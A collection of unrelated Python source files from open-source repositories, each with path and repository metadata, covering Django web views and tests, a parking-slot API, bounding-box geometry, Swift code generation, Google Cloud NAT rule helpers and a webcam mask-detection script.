def get_report(request): sequence = request.GET.get('sequence') if not sequence: return process_response(request, ResponseStatus.SEQUENCE_REQUIRED_ERROR) status = ValueErrorStatus.check_value_type({'sequence': sequence}) if status is not None: return process_response(request, status) sequence = int(sequence) report = prediction_models.Report.objects.filter(id=sequence).first() if not report: return process_response(request, ResponseStatus.REPORT_NOT_EXISTED_ERROR) request.data = report.transform_into_serialized_data() return process_response(request, ResponseStatus.OK) @Protect @RequiredMethod('GET') @ratelimit(**settings.RATE_LIMIT_LEVEL_3) def get_bird_info(request): bird_id = request.GET.get('bird_id') if not bird_id: return process_response(request, ResponseStatus.BIRD_ID_REQUIRED_ERROR) status = ValueErrorStatus.check_value_type({'bird_id': bird_id}) if status is not None: return process_response(request, status) bird_id = int(bird_id) if not 1 <= bird_id <= 200: return process_response(request, ResponseStatus.BIRD_ID_NOT_EXISTED_ERROR) bird = prediction_models.Bird.objects.filter(id=bird_id).first() request.data = bird.transform_into_serialized_data() return process_response(request, ResponseStatus.OK)
2,821
scripts/npc/backToVictoria.py
G00dBye/YYMS
54
2168540
map = 104020000 if sm.getFieldID() != 120040000: map = 120040000 if sm.sendAskYesNo("Would you like to go to #m" + str(map) + "#?"): sm.warp(map, 0)
159
gnosis/catalog/views/views_people.py
Zhenghao-Zhao/Gnosis-dev
0
2172352
from django.contrib.auth.decorators import login_required from django.contrib.admin.views.decorators import staff_member_required from django.shortcuts import render from catalog.models import Person, Paper from catalog.forms import PersonForm from catalog.forms import SearchPeopleForm from django.urls import reverse from django.http import HttpResponseRedirect from neomodel import db from django.shortcuts import redirect from django.contrib import messages def _person_find(person_name, exact_match=False): """ Searches the DB for a person whose name matches the given name :param person_name: :return: """ person_name = person_name.lower() person_name_tokens = [w for w in person_name.split()] if exact_match: if len(person_name_tokens) > 2: query = "MATCH (p:Person) WHERE LOWER(p.last_name) IN { person_tokens } AND LOWER(p.first_name) IN { person_tokens } AND LOWER(p.middle_name) IN { person_tokens } RETURN p LIMIT 20" else: query = "MATCH (p:Person) WHERE LOWER(p.last_name) IN { person_tokens } AND LOWER(p.first_name) IN { person_tokens } RETURN p LIMIT 20" else: query = "MATCH (p:Person) WHERE LOWER(p.last_name) IN { person_tokens } OR LOWER(p.first_name) IN { person_tokens } OR LOWER(p.middle_name) IN { person_tokens } RETURN p LIMIT 20" results, meta = db.cypher_query(query, dict(person_tokens=person_name_tokens)) if len(results) > 0: print("Found {} matching people".format(len(results))) people = [Person.inflate(row[0]) for row in results] return people else: return None def person_find(request): """ Searching for a person in the DB. :param request: :return: """ print("Calling person_find") people_found_ids = [] message = None storage = messages.get_messages(request=request) for request_message in storage: people_found_ids = request_message.message print("IDs of people found: {}".format(people_found_ids)) people_found_ids = people_found_ids.split(",") break people = [] if len(people_found_ids) > 0: people = Person.nodes.filter(uid__in=people_found_ids) print("Retrieved {} people from the database".format(len(people))) if request.method == "POST": form = SearchPeopleForm(request.POST) print("Received POST request") if form.is_valid(): people = _person_find(form.cleaned_data["person_name"]) if people is not None: return render(request, "person_find.html", {"people": people, "form": form, "message": message}) else: message = "No results found. Please try again!" elif request.method == "GET": print("Received GET request") form = SearchPeopleForm() return render(request, "person_find.html", {"people": people, "form": form, "message": message}) # # Person Views # def persons(request): people = Person.nodes.order_by("-created")[:50] message = None if request.method == "POST": form = SearchPeopleForm(request.POST) print("Received POST request") if form.is_valid(): print("Valid form") people_found = _person_find(form.cleaned_data["person_name"]) if people_found is not None: #print("Found people. Rendering person_find.html") people_found_ids = [person.uid for person in people_found] #print("ids as string {}".format(",".join(str(pid) for pid in people_found_ids))) messages.add_message(request, messages.INFO, ",".join(str(pid) for pid in people_found_ids)) return redirect("person_find") # return render( # request, # "person_find.html", # {"people": people_found, "form": form, "message": ""}, # ) else: message = "No results found. Please try again!" elif request.method == "GET": print("Received GET request") form = SearchPeopleForm() return render( request, "people.html", {"people": people, "form": form, "message": message} ) def person_detail(request, id): # Retrieve the paper from the database papers_authored = [] query = "MATCH (a) WHERE ID(a)={id} RETURN a" results, meta = db.cypher_query(query, dict(id=id)) if len(results) > 0: # There should be only one results because ID should be unique. Here we check that at # least one result has been returned and take the first result as the correct match. # Now, it should not happen that len(results) > 1 since IDs are meant to be unique. # For the MVP we are going to ignore the latter case and just continue but ultimately, # we should be checking for > 1 and failing gracefully. all_people = [Person.inflate(row[0]) for row in results] person = all_people[0] else: # go back to the paper index page return render( request, "people.html", {"people": Person.nodes.all(), "num_people": len(Person.nodes.all())}, ) # # Retrieve all papers co-authored by this person and list them # query = "MATCH (a:Person)-[r:authors]->(p:Paper) where id(a)={id} return p" results, meta = db.cypher_query(query, dict(id=id)) if len(results) > 0: papers_authored = [Paper.inflate(row[0]) for row in results] print("Number of papers co-authored by {}: {}".format(person.last_name, len(papers_authored))) for p in papers_authored: print("Title: {}".format(p.title)) else: print("No papers found for author {}".format(person.last_name)) request.session["last-viewed-person"] = id return render(request, "person_detail.html", {"person": person, "papers": papers_authored}) @login_required def person_create(request): user = request.user if request.method == "POST": person = Person() person.created_by = user.id form = PersonForm(instance=person, data=request.POST) if form.is_valid(): form.save() return HttpResponseRedirect(reverse("persons_index")) else: # GET form = PersonForm() return render(request, "person_form.html", {"form": form}) @login_required def person_update(request, id): # retrieve paper by ID # https://github.com/neo4j-contrib/neomodel/issues/199 query = "MATCH (a) WHERE ID(a)={id} RETURN a" results, meta = db.cypher_query(query, dict(id=id)) if len(results) > 0: all_people = [Person.inflate(row[0]) for row in results] person_inst = all_people[0] else: person_inst = Person() # if this is POST request then process the Form data if request.method == "POST": form = PersonForm(request.POST) if form.is_valid(): person_inst.first_name = form.cleaned_data["first_name"] person_inst.middle_name = form.cleaned_data["middle_name"] person_inst.last_name = form.cleaned_data["last_name"] person_inst.affiliation = form.cleaned_data["affiliation"] person_inst.website = form.cleaned_data["website"] person_inst.save() return HttpResponseRedirect(reverse("persons_index")) # GET request else: query = "MATCH (a) WHERE ID(a)={id} RETURN a" results, meta = db.cypher_query(query, dict(id=id)) if len(results) > 0: all_people = [Person.inflate(row[0]) for row in results] person_inst = all_people[0] else: person_inst = Person() form = PersonForm( initial={ "first_name": person_inst.first_name, "middle_name": person_inst.middle_name, "last_name": person_inst.last_name, "affiliation": person_inst.affiliation, "website": person_inst.website, } ) return render(request, "person_update.html", {"form": form, "person": person_inst}) # should limit access to admin users only!! @staff_member_required def person_delete(request, id): print("WARNING: Deleting person id {} and all related edges".format(id)) # Cypher query to delete the paper node query = "MATCH (p:Person) WHERE ID(p)={id} DETACH DELETE p" results, meta = db.cypher_query(query, dict(id=id)) return HttpResponseRedirect(reverse("persons_index"))
8,571
programs/testing with cam.py
Anurag-Varma/face-recognition-with-and-without-mask
1
2171502
# -*- coding: utf-8 -*- """ Created on Tue Sep 15 20:01:17 2020 @author: panur """ import cv2 import numpy as np from keras.models import model_from_json from keras.preprocessing.image import img_to_array #load model model = model_from_json(open("fer.json", "r").read()) #load weights model.load_weights('fer.h5') detection_model_path="C:/Users/panur/facedetection/haarcascade_frontalface_default.xml" face_detection = cv2.CascadeClassifier(detection_model_path) video="C:/Users/panur/Downloads/withmask_1602-18-737-006.mp4" ret=1 flag=True cap = cv2.VideoCapture(1) #frameRate = cap.get(30) while(ret!=0 and cap.isOpened()): ret, fm=cap.read() cv2.imwrite('live_test_img.jpg', fm) fm = cv2.resize(fm, (200, 200)) file = cv2.cvtColor(fm, cv2.COLOR_BGR2RGB) orig_frame = file frame = file faces = face_detection.detectMultiScale(frame,scaleFactor=1.1,minNeighbors=5,minSize=(30,30),flags=cv2.CASCADE_SCALE_IMAGE) i=0 test="" if (len(faces)) : faces = sorted(faces, reverse=True,key=lambda x: (x[2] - x[0]) * (x[3] - x[1]))[0] (fX, fY, fW, fH) = faces roi = frame[fY:fY + fH, fX:fX + fW] roi = cv2.resize(roi, (200, 200),3) roi = frame.astype("float") / 255.0 roi = img_to_array(roi) roi = np.expand_dims(roi, axis=0) preds=model.predict_classes(roi)[0] print(preds) if preds==0: print("withmask_anurag"+str(i)) test='withmask_anurag' elif preds==10: print("withoutmask_anurag"+str(i)) test='withoutmask_anurag' i=i+1 cv2.putText(fm,test, (fX-15, fY - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2) cv2.rectangle(fm, (fX, fY), (fX + fW, fY + fH),(0, 0, 255), 2) file=fm cv2.imshow("Live Video", fm) k=cv2.waitKey(25) if k == 27: ret=0 break print("closed") cap.release() cv2.destroyAllWindows()
1,923
marklogic/models/database/ruleset.py
paul-hoehne/MarkLogic_Python
7
2172307
# -*- coding: utf-8 -*- # # Copyright 2015 MarkLogic Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0# # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # File History # ------------ # # <NAME> 05/10/2015 Initial development """ Classes for dealing with rulesets. """ class RuleSet: """ A database rule set. """ def __init__(self, location): """ Create a rule set. :param location: the ruleset location """ self._config = { 'location': location } def location(self): """ The location. """ return self._config['location'] def set_location(self, location): """ Set the location. """ self._config['location'] = location return self
1,263
api/views/parking_slot.py
santiagoSSAA/ParkingLot_Back
0
2172503
""" Contains Parking Slot endpoint definition """ from cerberus import Validator from rest_framework.views import APIView from rest_framework.response import Response from rest_framework import status from ..helpers.token import TokenHandler from ..helpers.paginator import paginate_content from ..models.parking_slot import ParkingSlot from ..serializers.parking_slot import ParkingSlotSerializer from ..serializers.parking_slot import ParkingSlotClientSerializer class ParkingSlotApi(APIView, TokenHandler): """ Defines the HTTP verbs to parking slot model management. """ def post(self, request): """ Create a parking slot. Parameters ---------- request (dict) Contains http transaction information. Returns ------- Response (JSON, int) Body response and status code. """ payload, user = self.get_payload(request) if not payload: return Response(status=status.HTTP_401_UNAUTHORIZED) if user.profile != "admin": return Response(status=status.HTTP_403_FORBIDDEN) validator = Validator({"place_code": {"required": True, "type": "string"}}) if not validator.validate(request.data): return Response({ "code": "invalid_body", "detailed": "cuerpo inválido", "data": validator.errors }, status=status.HTTP_400_BAD_REQUEST) if ParkingSlot.objects.filter( place_code=request.data.get("place_code").upper(),is_active=True): return Response({ "code": "slot_already_exists", "code": "Estacionamiento ya registrado" },status=status.HTTP_409_CONFLICT) request.data["place_code"] = request.data["place_code"].upper() slot = ParkingSlot.objects.create(**request.data) return Response({"created": slot.pk}, status=status.HTTP_201_CREATED) @paginate_content() def get(self, request): """ Retrieve a list of slots. Parameters ---------- request (dict) Contains http transaction information. Returns ------- Response (JSON, int) Body response and status code. """ payload, user = self.get_payload(request) if not payload: return Response(status=status.HTTP_401_UNAUTHORIZED) validator = Validator({ "place_code": {"required": False,"type": "string"}, "status": {"required": False, "type": "string", "allowed": ["Ocupado", "Disponible"]} }) if not validator.validate(request.GET): return Response({ "code": "invalid_filtering_params", "detailed": "Parámetros de búsqueda inválidos", "data": validator.errors }, status=status.HTTP_400_BAD_REQUEST) query = {} if request.GET.get("place_code"): query["place_code"] = request.GET.get("place_code") if user.profile == "client": query["is_active"] = True slots = ParkingSlot.objects.filter(**query) if slots and request.GET.get("status"): slots = [slot.id for slot in slots if slot.get_status() == request.GET.get("place_code")] slots = ParkingSlot.objects.filter(pk__in=slots) if user.profile != "admin": slots = [slot.id for slot in slots if slot.get_status() == "Disponible"] slots = ParkingSlot.objects.filter(pk__in=slots) count = slots.count() data = slots.order_by('-created')[ self.pagination_start: self.pagination_end + 1] return Response({ 'count': count, 'data': (ParkingSlotClientSerializer(data,many=True) if user.profile == "client" else ParkingSlotSerializer(data,many=True) ).data, }, status=status.HTTP_200_OK) class SpecificParkingSlotApi(APIView, TokenHandler): """ Defines the HTTP verbs to specific parking slot model management. """ def get(self, request, *args, **kwargs): """ Retrieve specific slot information. Parameters ---------- request (dict) Contains http transaction information. Returns ------- Response (JSON, int) Body response and status code. """ payload, user = self.get_payload(request) if not payload: return Response(status=status.HTTP_401_UNAUTHORIZED) if user.profile != "admin": return Response(status=status.HTTP_403_FORBIDDEN) slot = ParkingSlot.objects.filter( pk=kwargs["id"],is_active=True).first() if not slot: return Response({ "code": "slot_not_found", "detailed": "aparcamiento no encontrado" },status=status.HTTP_404_NOT_FOUND) return Response({ "data": ParkingSlotSerializer(slot).data },status=status.HTTP_200_OK) def patch(self, request, *args, **kwargs): """ Update an slot information. Parameters ---------- request (dict) Contains http transaction information. Returns ------- Response (JSON, int) Body response and status code. """ payload, user = self.get_payload(request) if not payload: return Response(status=status.HTTP_401_UNAUTHORIZED) if user.profile != "admin": return Response(status=status.HTTP_403_FORBIDDEN) validator = Validator({"place_code": {"required": False,"type": "string"}}) if not validator.validate(request.data): return Response({ "code": "invalid_body", "detailed": "cuerpo inválido", "data": validator.errors }, status=status.HTTP_400_BAD_REQUEST) if not ParkingSlot.objects.filter(pk=kwargs["id"],is_active=True): return Response({ "code": "slot_not_found", "detailed": "aparcamiento no encontrado" },status=status.HTTP_404_NOT_FOUND) ParkingSlot.objects.filter(pk=kwargs["id"]).update(**request.data) return Response(status=status.HTTP_200_OK) def delete(self, request, *args, **kwargs): """ Delete slot information. Parameters ---------- request (dict) Contains http transaction information. Returns ------- Response (JSON, int) Body response and status code. """ payload, user = self.get_payload(request) if not payload: return Response(status=status.HTTP_401_UNAUTHORIZED) if user.profile != "admin": return Response(status=status.HTTP_403_FORBIDDEN) slot = ParkingSlot.objects.filter( pk=kwargs["id"],is_active=True).first() if not slot: return Response({ "code": "slot_not_found", "detailed": "aparcamiento no encontrado" },status=status.HTTP_404_NOT_FOUND) slot.is_active = False slot.save() return Response(status=status.HTTP_200_OK)
7,430
pyml/BoundingBox.py
rlan/pyml
0
2171405
from __future__ import print_function from __future__ import division import numpy as np class Line: """Line object Example ------- >>> from BoundingBox import Line >>> l1 = Line(-2, 2) >>> l1.length() 4 Test cases: --- first === second ====== -- -- ------ ---------- -------------- ---------- -- No overlap. >>> x = Line.fromOverlap(Line(1,10), Line(10,20)) >>> print(x) [0 0] >>> x.length() 0 >>> x = Line.fromOverlap(Line(11,12), Line(10,20)) >>> print(x) [11 12] >>> x.length() 1 Overlap of 2, first left. >>> x = Line.fromOverlap(Line(8,12), Line(10,20)) >>> print(x) [10 12] >>> x.length() 2 Edge overlap >>> x = Line.fromOverlap(Line(6,20), Line(10,20)) >>> print(x) [10 20] >>> x.length() 10 Second completely inside first. >>> x = Line.fromOverlap(Line(1,40), Line(20,30)) >>> print(x) [20 30] >>> x.length() 10 Edge overlap >>> x = Line.fromOverlap(Line(10,25), Line(10,20)) >>> print(x) [10 20] >>> x.length() 10 No overlap >>> x = Line.fromOverlap(Line(0,10), Line(-10,-5)) >>> print(x) [0 0] >>> x.length() 0 """ def __init__(self, x1, x2): self.x1 = x1 self.x2 = x2 # TODO error check. x2 >= x1 def __str__(self): return "[{} {}]".format(self.x1, self.x2) def length(self): return self.x2 - self.x1 @classmethod def fromOverlap(cls, first, second): #print("first", first) #print("second", second) if first.x2 <= second.x1: #print("return 0") return cls(0, 0) elif first.x2 <= second.x2: if first.x1 >= second.x1: #print("return 1") return first else: #print("return 2") return cls(second.x1, first.x2) else: # first.x2 > second.x2 if first.x1 >= second.x2: return cls(0, 0) elif first.x1 >= second.x1: #print("return 3") return cls(first.x1, second.x2) else: # first.x1 < second.x1 #print("return 4") return second class BoundingBox: """"Bounding Box object - works for pixel values as well as real values. >>> import numpy as np >>> from BoundingBox import BoundingBox >>> box = BoundingBox( (1,2), (4,5) ) >>> box.ul() array([1, 2]) >>> box.lr() array([4, 5]) >>> box.ur() array([4, 2]) >>> box.ll() array([1, 5]) >>> box.contour() array([[1, 2], [4, 2], [4, 5], [1, 5], [1, 2]]) >>> box.area() 9 >>> box.bound(lower_right=[3,4]).lr() array([3, 4]) >>> box.bound(upper_left=[2,3]).ul() array([2, 3]) >>> box.area() 1 >>> print(box) [[2 3] [3 4]] >>> contour = np.array([[1, 2], [4, 2], [4, 5], [1, 5], [1, 2]]) >>> print(BoundingBox.fromContour(contour)) [[1. 2.] [4. 5.]] """ def __init__(self, upper_left=None, lower_right=None): """Init object if upper left or lower right point is given. Parameters ---------- upper_left : np.array(2) lower_right : np.array(2) """ #TODO error check that ul point is instead ul, lr point is indeed lr. if upper_left is None: self.upper_left_ = np.zeros(2) else: self.upper_left_ = np.array(upper_left) #print(type(self.upper_left_), self.upper_left_) if lower_right is None: self.lower_right_ = np.zeros(2) else: self.lower_right_ = np.array(lower_right) #print(type(self.lower_right_), self.lower_right_) @classmethod def fromContour(cls, contour): """Create a bounding box from a contour set. Parameters ---------- contour : list of np.array(2) A list of points describing a contour. Returns ------- self A new self object. """ mins = np.amin(contour, axis=0) maxs = np.amax(contour, axis=0) upper_left = np.floor(mins) # assumes pixel as coordinates lower_right = np.floor(maxs) # assumes pixel as coordinates return cls(upper_left, lower_right) @classmethod def fromOverlap(cls, first, second): """Create a bounding box of the intercept. Parameters ---------- first : BoundingBox second : BoundingBox Return ------ BoundingBox Example ------- >>> from BoundingBox import BoundingBox Some overlap >>> first = BoundingBox( (2,1), (5,4) ) >>> second = BoundingBox( (4,3), (8,5) ) >>> overlap_box = BoundingBox.fromOverlap(first, second) >>> print(overlap_box) [[4 3] [5 4]] No overlap >>> first = BoundingBox( (2,1), (5,4) ) >>> second = BoundingBox( (3,5), (5,7) ) >>> overlap_box = BoundingBox.fromOverlap(first, second) >>> print(overlap_box) [[0 0] [0 0]] Share an edge >>> first = BoundingBox( (4,3), (8,5) ) >>> second = BoundingBox( (3,5), (5,7) ) >>> overlap_box = BoundingBox.fromOverlap(first, second) >>> print(overlap_box) [[0 0] [0 0]] Second completely inside first. >>> first = BoundingBox( (2,1), (9,7) ) >>> second = BoundingBox( (4,3), (8,5) ) >>> overlap_box = BoundingBox.fromOverlap(first, second) >>> print(overlap_box) [[4 3] [8 5]] First completely inside second. >>> first = BoundingBox( (4,3), (8,5) ) >>> second = BoundingBox( (2,1), (9,7) ) >>> overlap_box = BoundingBox.fromOverlap(first, second) >>> print(overlap_box) [[4 3] [8 5]] First is sideway inside second on the right >>> first = BoundingBox( (6,4), (7,6) ) >>> second = BoundingBox( (4,3), (8,5) ) >>> overlap_box = BoundingBox.fromOverlap(first, second) >>> print(overlap_box) [[6 4] [7 5]] Corner touching >>> first = BoundingBox( (2,1), (5,4) ) >>> second = BoundingBox( (5,4), (6,5) ) >>> overlap_box = BoundingBox.fromOverlap(first, second) >>> print(overlap_box) [[0 0] [0 0]] """ # row line_first = Line( first.ul()[0], first.lr()[0] ) line_second = Line( second.ul()[0], second.lr()[0] ) row_overlap = Line.fromOverlap(line_first, line_second) #print("row_overlap", row_overlap) # col line_first = Line( first.ul()[1], first.lr()[1] ) line_second = Line( second.ul()[1], second.lr()[1] ) col_overlap = Line.fromOverlap(line_first, line_second) #print("col_overlap", col_overlap) if (row_overlap.length() == 0) or (col_overlap.length() == 0): return cls( (0,0), (0,0) ) else: return cls( (row_overlap.x1, col_overlap.x1), (row_overlap.x2, col_overlap.x2) ) def height(self): """ Returns ------- float Height of bounding box. Example ------- >>> from BoundingBox import BoundingBox >>> b = BoundingBox( (4,3), (8,5) ) >>> b.height() 4 """ return self.lower_right_[0] - self.upper_left_[0] def width(self): """ Returns ------- float Width of bounding box. Example ------- >>> from BoundingBox import BoundingBox >>> b = BoundingBox( (4,3), (8,5) ) >>> b.width() 2 """ return self.lower_right_[1] - self.upper_left_[1] def area(self): """ Returns ------- float Area of bounding box. Example ------- >>> from BoundingBox import BoundingBox >>> b = BoundingBox( (4,3), (8,5) ) >>> b.area() 8 """ return self.height() * self.width() def aspectRatio(self): """ Returns ------- float Aspect ratio of the box Example ------- >>> from BoundingBox import BoundingBox >>> b = BoundingBox( (4,3), (8,5) ) >>> b.aspectRatio() 0.5 >>> b = BoundingBox( (4,3), (4,5) ) >>> b.aspectRatio() nan """ if float(self.height()) == 0.0: return float('nan') else: return self.width() / self.height() def ul(self): """ Returns ------- np.array(2) Return the upper left point, e.g. (row, col) """ return self.upper_left_ def lr(self): """ Returns ------- np.array(2) Return the lower right point, e.g. (row, col) """ return self.lower_right_ def ur(self): """ Returns ------- np.array(2) Return the upper right point, e.g. (row, col) """ return np.array([self.lower_right_[0], self.upper_left_[1]]) def ll(self): """ Returns ------- np.array(2) Return the lower left point, e.g. (row, col) """ return np.array([self.upper_left_[0], self.lower_right_[1]]) def contour(self): """ Returns ------- A np.array of np.array(2) Each contour is an ndarray of shape (n, 2), consisting of n (row, column) coordinates along the contour. """ return np.array([self.ul(), self.ur(), self.lr(), self.ll(), self.ul()]) def bound(self, upper_left = None, lower_right = None): """Trim bounding box by given limits. Parameters ---------- upper_left : np.array(2) lower_right : np.array(2) Returns ------- self Modified self object. """ if upper_left is not None: if upper_left[0] > self.upper_left_[0]: self.upper_left_[0] = upper_left[0] if upper_left[1] > self.upper_left_[1]: self.upper_left_[1] = upper_left[1] if lower_right is not None: if self.lower_right_[0] > lower_right[0]: self.lower_right_[0] = lower_right[0] if self.lower_right_[1] > lower_right[1]: self.lower_right_[1] = lower_right[1] return self def __str__(self): """Return string representation Returns ------- str String representation of self. """ x = np.array([self.upper_left_, self.lower_right_]) return "{}".format(x) if __name__ == "__main__": import doctest import sys (failure_count, test_count) = doctest.testmod() sys.exit(failure_count)
9,905
utils/data/swift_decls.py
LuizZak/swift-blend2d
7
2171791
from dataclasses import dataclass from enum import Enum from typing import List from pathlib import Path from utils.converters.syntax_stream import SyntaxStream from utils.data.compound_symbol_name import CompoundSymbolName from utils.constants.constants import backticked_term class SwiftDeclVisitResult(Enum): """ Defines the behavior of a SwiftDeclVisitor as it visits declarations. """ VISIT_CHILDREN = 0 "The visitor should visit the children of a declaration." SKIP_CHILDREN = 1 "The visitor should skip the children of a declaration." @dataclass class SourceLocation(object): file: Path line: int column: int | None @dataclass class SwiftDecl(object): name: CompoundSymbolName original_name: CompoundSymbolName origin: SourceLocation doccomments: list[str] "A list of documentation comments associated with this element." def write(self, stream: SyntaxStream): for comment in self.doccomments: stream.line(f"/// {comment}") def copy(self): raise NotImplementedError("Must be implemented by subclasses.") def accept(self, visitor: "SwiftDeclVisitor") -> SwiftDeclVisitResult: raise NotImplementedError("Must be implemented by subclasses.") def accept_post(self, visitor: "SwiftDeclVisitor"): raise NotImplementedError("Must be implemented by subclasses.") def children(self) -> list["SwiftDecl"]: raise NotImplementedError("Must be implemented by subclasses.") @dataclass class SwiftEnumCaseDecl(SwiftDecl): def write(self, stream: SyntaxStream): super().write(stream) if self.name.to_string() != self.original_name.to_string(): stream.line( f"static let {backticked_term(self.name.to_string())} = {self.original_name.to_string()}" ) def copy(self): return SwiftEnumCaseDecl( name=self.name, original_name=self.original_name, origin=self.origin, doccomments=self.doccomments, ) def accept(self, visitor: "SwiftDeclVisitor") -> SwiftDeclVisitResult: return visitor.visit_enum_case_decl(self) def accept_post(self, visitor: "SwiftDeclVisitor"): return visitor.post_enum_case_decl(self) def children(self) -> list["SwiftDecl"]: return list() @dataclass class SwiftEnumDecl(SwiftDecl): cases: List[SwiftEnumCaseDecl] conformances: list[str] def write(self, stream: SyntaxStream): super().write(stream) name = self.name.to_string() if name != self.original_name.to_string(): stream.line(f"typealias {name} = {self.original_name.to_string()}") stream.line() # Emit conformances if len(self.conformances) > 0: for conformance in set(self.conformances): stream.line(f"extension {name}: {conformance} {{ }}") stream.line() decl = f"public extension {name}" if len(self.cases) == 0: stream.line(decl + " { }") return with stream.block(decl + " {"): for i, case in enumerate(self.cases): if i > 0: stream.line() case.write(stream) def copy(self): return SwiftEnumDecl( name=self.name, original_name=self.original_name, origin=self.origin, doccomments=self.doccomments, cases=list(map(lambda c: c.copy(), self.cases)), conformances=self.conformances, ) def accept(self, visitor: "SwiftDeclVisitor") -> SwiftDeclVisitResult: return visitor.visit_enum_decl(self) def accept_post(self, visitor: "SwiftDeclVisitor"): return visitor.post_enum_decl(self) def children(self) -> list["SwiftDecl"]: return list(self.cases) class SwiftDeclVisitor: def visit_enum_decl(self, decl: SwiftEnumDecl) -> SwiftDeclVisitResult: return SwiftDeclVisitResult.VISIT_CHILDREN def post_enum_decl(self, decl: SwiftEnumDecl): pass def visit_enum_case_decl(self, decl: SwiftEnumCaseDecl) -> SwiftDeclVisitResult: return SwiftDeclVisitResult.VISIT_CHILDREN def post_enum_case_decl(self, decl: SwiftEnumCaseDecl): pass def walk_decl(self, decl: SwiftDecl): walker = SwiftDeclWalker(self) walker.walk_decl(decl) class SwiftDeclAnyVisitor(SwiftDeclVisitor): """ A declaration visitor that pipes all visits to `self.visit_any_decl` """ def visit_any_decl(self, decl: SwiftDecl) -> SwiftDeclVisitResult: return SwiftDeclVisitResult.VISIT_CHILDREN def post_any_decl(self, decl: SwiftDecl): pass def visit_enum_decl(self, decl: SwiftEnumDecl) -> SwiftDeclVisitResult: return self.visit_any_decl(decl) def post_enum_decl(self, decl: SwiftEnumDecl): self.post_any_decl(decl) def visit_enum_case_decl(self, decl: SwiftEnumCaseDecl) -> SwiftDeclVisitResult: return self.visit_any_decl(decl) def post_enum_case_decl(self, decl: SwiftEnumCaseDecl): self.post_any_decl(decl) class SwiftDeclWalker: def __init__(self, visitor: SwiftDeclVisitor): self.visitor = visitor def walk_decl(self, decl: SwiftDecl): result = decl.accept(self.visitor) if result == SwiftDeclVisitResult.VISIT_CHILDREN: for child in decl.children(): self.walk_decl(child) decl.accept_post(self.visitor)
5,551
lib/googlecloudsdk/command_lib/compute/routers/nats/rules/rules_utils.py
google-cloud-sdk-unofficial/google-cloud-sdk
2
2171645
# -*- coding: utf-8 -*- # # Copyright 2020 Google LLC. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Util functions for NAT commands.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from googlecloudsdk.command_lib.compute.routers.nats.rules import flags from googlecloudsdk.core import exceptions as core_exceptions import six def CreateRuleMessage(args, compute_holder): """Creates a Rule message from the specified arguments.""" active_ips = [ six.text_type(ip) for ip in flags.ACTIVE_IPS_ARG_CREATE.ResolveAsResource( args, compute_holder.resources) ] return compute_holder.client.messages.RouterNatRule( ruleNumber=args.rule_number, match=args.match, action=compute_holder.client.messages.RouterNatRuleAction( sourceNatActiveIps=active_ips)) class RuleNotFoundError(core_exceptions.Error): """Raised when a Rule is not found.""" def __init__(self, rule_number): msg = 'Rule `{0}` not found'.format(rule_number) super(RuleNotFoundError, self).__init__(msg) def FindRuleOrRaise(nat, rule_number): """Returns the Rule with the given rule_number in the given NAT.""" for rule in nat.rules: if rule.ruleNumber == rule_number: return rule raise RuleNotFoundError(rule_number) def UpdateRuleMessage(rule, args, compute_holder): """Updates a Rule message from the specified arguments.""" if args.match: rule.match = args.match if args.source_nat_active_ips: rule.action.sourceNatActiveIps = [ six.text_type(ip) for ip in flags.ACTIVE_IPS_ARG_UPDATE.ResolveAsResource( args, compute_holder.resources) ] if args.source_nat_drain_ips: rule.action.sourceNatDrainIps = [ six.text_type(ip) for ip in flags.DRAIN_IPS_ARG.ResolveAsResource( args, compute_holder.resources) ] elif args.clear_source_nat_drain_ips: rule.action.sourceNatDrainIps = []
2,498
pytoolkit/layers/__init__.py
ak110/pytoolk
26
2171291
"""カスタムレイヤー。""" # pylint: skip-file # flake8: noqa from .activations import * from .attentions import * from .blocks import * from .convolutional import * from .endpoint import * from .misc import * from .noise import * from .normalization import * from .pooling import *
273
classphoto/tests/test_view.py
p2pu/mechanical-mooc
12
2171008
from django.test import TestCase from django.test.client import Client from mock import patch from signup import models as signup_api from classphoto import models as classphoto_api @patch('signup.models.sequence_model.get_current_sequence_number', lambda: 1) class ViewTest(TestCase): SIGNUP_DATA = { 'email': '<EMAIL>', 'questions': { 'timezone': 'Africa/Johannesburg', 'groupRadios': 'true', 'styleRadios': 'try', 'expertiseRadios': 'think', } } BIO_DATA = { 'email': '<EMAIL>', 'name': '<NAME>', 'bio': 'This is some info', 'avatar': 'http://placehold.it/120x120' } def test_sequence_redirect(self): c = Client() resp = c.get('/classphoto/') self.assertRedirects(resp, '/classphoto/1/') def test_un_signedup_bio(self): c = Client() resp = c.post('/classphoto/1/save_bio/', self.BIO_DATA) self.assertRedirects(resp, '/classphoto/1/') bios = classphoto_api.get_bios(1) self.assertEquals(len(bios), 0) def test_signed_up_not_signed_in_bio_save(self): signup_api.create_signup(**self.SIGNUP_DATA) c = Client() resp = c.post('/classphoto/1/save_bio/', self.BIO_DATA) self.assertRedirects(resp, '/classphoto/1/') bios = classphoto_api.get_bios(1) self.assertEquals(len(bios), 0) @patch('classphoto.emails.mailgun.api.send_email') def test_request_user_link(self, patcher): signup = signup_api.create_signup(**self.SIGNUP_DATA) c = Client() resp = c.post('/classphoto/request_link/', self.BIO_DATA, follow=True) self.assertRedirects(resp, '/classphoto/1/') self.assertTrue(patcher.called) def test_signed_in(self): signup = signup_api.create_signup(**self.SIGNUP_DATA) c = Client() resp = c.get('/classphoto/1/?key={0}'.format(signup['key'])) session = c.session self.assertEquals(session['user_email'], self.BIO_DATA['email']) self.assertRedirects(resp, '/classphoto/1/') def test_signed_up_signed_in_bio_save(self): signup = signup_api.create_signup(**self.SIGNUP_DATA) c = Client() resp = c.get('/classphoto/1/?key={0}'.format(signup['key'])) resp = 